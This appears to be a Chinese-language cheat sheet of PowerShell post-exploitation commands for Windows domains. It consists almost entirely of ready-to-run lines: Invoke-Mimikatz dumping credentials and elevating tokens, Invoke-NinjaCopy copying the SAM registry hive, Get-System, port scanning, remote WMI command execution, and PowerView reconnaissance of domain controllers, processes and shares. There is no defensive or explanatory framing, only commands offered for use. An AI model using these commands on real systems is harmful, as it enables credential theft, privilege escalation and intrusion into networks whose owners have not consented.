Invoke-Mimikatz(依賴管理者)
Import-Module .\invoke-mimikatz.ps1
Invoke-Mimikatz –DumpCreds
使用Invoke-Mimikatz –command “mimikatz指令”來執行指令:
Invoke-Mimikatz –command "token::elevate"
Invoke-Ninjacopy (依賴管理者)
直接拷貝系統檔案:
Import-Module .\invoke-ninjacopy.ps1
invoke-ninjacopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Users\administrator\Desktop\SAM
Get-System (依賴管理者)
Import-Module .\Get-System
get-system
Invoke-Portscan
掃描Top50端口:
Invoke-Portscan –Hosts ip位址 –TopPorts 50
掃描特定端口:
Invoke-Portscan –Hosts ip位址 –Ports 端口
Invoke-ReverseDnsLookup
反向解析IP位址:
Import-Module .\Invoke-ReverseDnsLookup.ps1
Invoke-ReverseDnsLookup 192.168.91.131
Invoke-Wmicommand
Import-Module .\Invoke-Wmicommand.ps1
Invoke-Wmicommand -Payload {whoami}
Get-NetDomain
Import-Module .\PowerView.ps1
Get-NetDomain
Get-NetDomainController
get-NetDomainController
Invoke-ProcessHunter –ProcessName 程序名
Invoke-ProcessHunter –ProcessName powershell
Get-NetShare擷取共享資訊
get-netshare